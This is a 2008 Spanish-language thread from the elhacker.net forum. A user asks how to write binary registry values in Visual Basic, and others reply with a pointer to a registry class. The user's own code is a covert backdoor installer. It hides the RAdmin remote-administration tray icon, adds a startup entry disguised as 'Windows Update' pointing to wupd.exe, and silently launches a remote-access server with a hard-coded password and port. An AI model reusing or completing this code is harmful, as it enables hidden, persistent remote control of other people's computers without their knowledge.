elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Agregar al registro tipo Binary?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Agregar al registro tipo Binary?  (Leído 1,711 veces)
Hole_System

Desconectado Desconectado

Mensajes: 239


Ver Perfil
Agregar al registro tipo Binary?
« en: 1 Agosto 2008, 19:07 pm »

Hola people veran lo mio es sencillo lo que necesito es agregar tres valores en el Registro de tipo Binary como veran en el codigo de abajo, estoy anadiendo:
01 00 00 00
pero tambien necesito agregar estos otros 2..
4c 78 c7 ed d9 e4 16 e9 45 1b e9 7c bb 7c 2e cb
y
b4 11 00 00
como hago para agregarlos

Gracias...


Const REG_SZ = 1    ' Unicode nul terminated string
Const REG_BINARY = 3    ' Free form binary
Const HKEY_LOCAL_MACHINE = &H80000002
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Sub SaveStringLong(hKey As Long, strPath As String, strValue As String, strData As String, dif As String)
    Dim Ret
    '   Create a new key
    RegCreateKey hKey, strPath, Ret
    '   Set the key's value
    If dif = 1 Then
        RegSetValueEx Ret, strValue, 0, REG_BINARY, CLng(strData), 4
    ElseIf dif = 2 Then
        RegSetValueEx Ret, strValue, 0, REG_SZ, ByVal strData, Len(strData)
    End If
    '   Close the key
    RegCloseKey Ret
End Sub

Private Sub Form_Load()
    'KPD-Team 1998
    'URL: http://www.allapi.net/
    'E-Mail: KPDTeam@Allapi.net
    Dim strString As String
    'Ask for a value
    'Save the value to the registry
    SaveStringLong HKEY_LOCAL_MACHINE, "System\RAdmin\v2.0\Server\Parameters", "DisableTrayIcon", "01", "1" ' Agrego 01 00 00 00
    SaveStringLong HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", "Windows Update", "C:\Windows\System32\wupd.exe", "2"
    Shell "apisystem.exe /pass:zxczxc /port:4532", vbHide
    End
End Sub


En línea

By Pitoniso.
cobein


Desconectado Desconectado

Mensajes: 759



Ver Perfil WWW
Re: Agregar al registro tipo Binary?
« Respuesta #1 en: 3 Agosto 2008, 10:59 am »

Busca la clase Lightning en PSC que tiene todo


En línea

http://www.advancevb.com.ar
Más Argentino que el morcipan
Aguante el Uvita tinto, Tigre, Ford y seba123neo
Karcrack es un capo.
Hole_System

Desconectado Desconectado

Mensajes: 239


Ver Perfil
Re: Agregar al registro tipo Binary?
« Respuesta #2 en: 3 Agosto 2008, 21:36 pm »

Busca la clase Lightning en PSC que tiene todo

puedes ser mas especifico
En línea

By Pitoniso.
cobein


Desconectado Desconectado

Mensajes: 759



Ver Perfil WWW
Re: Agregar al registro tipo Binary?
« Respuesta #3 en: 3 Agosto 2008, 21:45 pm »

http://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=63220&lngWId=1
En línea

http://www.advancevb.com.ar
Más Argentino que el morcipan
Aguante el Uvita tinto, Tigre, Ford y seba123neo
Karcrack es un capo.
naderST


Desconectado Desconectado

Mensajes: 625



Ver Perfil WWW
Re: Agregar al registro tipo Binary?
« Respuesta #4 en: 4 Agosto 2008, 02:03 am »

Busca la clase Lightning en PSC que tiene todo

puedes ser mas especifico


Mas especifico no pudo ser ^^
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como agregar un arreglo de tipo persona en un Archivo en java.
Java
rub'n 7 7,837 Último mensaje 30 Marzo 2011, 17:10 pm
por rub'n
Dejar algún tipo de registro al abrir un Batch
Scripting
z3nth10n 5 3,241 Último mensaje 3 Julio 2013, 10:07 am
por z3nth10n
Ayuda con Bat para agregar un registro
Hacking
krizalidk 0 2,274 Último mensaje 15 Agosto 2013, 16:53 pm
por krizalidk
Agregar Registro en BD con ADO
Programación Visual Basic
Brian1511 0 1,455 Último mensaje 9 Febrero 2015, 18:36 pm
por Brian1511
"No se puede agregar o cambiar el registro porque se necesita un registro relaci
.NET (C#, VB.NET, ASP)
Guillito 1 3,005 Último mensaje 16 Abril 2015, 21:03 pm
por fran800m
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines